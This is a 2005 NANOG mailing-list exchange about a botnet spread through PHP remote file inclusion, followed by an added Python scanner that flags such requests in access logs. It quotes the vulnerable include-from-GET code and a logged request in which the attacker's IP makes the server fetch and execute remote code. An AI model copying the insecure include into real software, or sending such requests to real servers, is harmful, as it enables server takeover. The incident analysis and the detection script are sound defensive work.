You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)
-----Original Message-----
From: Barrett G. Lyon [mailto:[EMAIL PROTECTED]]
Sent: Fri Dec 23 19:21:47 2005
To: nanog@merit.edu
Subject: Re:Destructive botnet originating from Japan
Well, it appears that bad code always seems to be the root of
problems. According to our research today, the problem appears to be
caused by incorrectly written PHP applications that perform includes
using a string without running any validation against the string:
index.php?test=test
$test=$_GET[test];
include("$test.php");
When the include executes, the test string passed from the GET
includes execution instructions:
"GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
It appears that the attacker at 210.170.60.2 (also the botnet hosting
IRC server) is spreading his code as the include is called, pulling
and executing PHP code from a remote server that injects the software.
I'm not sure if this needs to be alerted to anyone outside of this
list, but it's pretty nasty.
-Barrett
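As an added example (not from Barrett's post or anything the list published), a small Python scanner that flags access-log requests whose percent-decoded query parameters carry a remote URL, which is exactly the pattern in the log line quoted above. The log prefix, client IPs, timestamps and the second and third sample lines are constructed; the first request line is the one quoted in the post.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Request-line fields of a combined-format access log entry (the rest is ignored).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# URL schemes PHP's include() will fetch when allow_url_fopen / allow_url_include is on.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}

def rfi_indicators(line):
    """Return (param, decoded value) pairs whose value is a remote URL, i.e. an RFI attempt."""
    m = LOG_RE.search(line)
    if not m:
        return []
    query = urlparse(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes, so 'test=http%3A//host/...' comes back as 'http://host/...'
    for name, value in parse_qsl(query, keep_blank_values=True):
        try:
            scheme = urlparse(value.strip()).scheme.lower()
        except ValueError:  # malformed URL text (e.g. unbalanced brackets) is not a remote scheme
            continue
        if scheme in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (line number, indicators) for every log line carrying an RFI indicator."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := rfi_indicators(line))]

# Constructed sample: line 1 reproduces the request quoted in the post (client IP and
# timestamp are made up); line 2 is a benign request; line 3 is a fully encoded variant
# against a documentation-range host. The trailing '?' in the decoded value turns the
# '.php' that include() appends into a query string on the remote fetch.
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Dec/2005:18:40:12 +0900] "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '198.51.100.8 - - [23/Dec/2005:18:41:03 +0900] "GET /index.php?test=test HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [23/Dec/2005:18:42:55 +0900] "GET /index.php?test=HTTP%3A%2F%2F192.0.2.10%2Fx.txt%3F HTTP/1.0" 404 301 "-" "Wget/1.6"',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        for name, value in hits:
            print(f"line {n}: parameter {name!r} points at remote code: {value}")
```

Run over a real access log one line at a time; the fix on the application side is still to allow-list the includable page names rather than to rely on log review.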
Title: RE: Re:Destructive botnet originating from Japan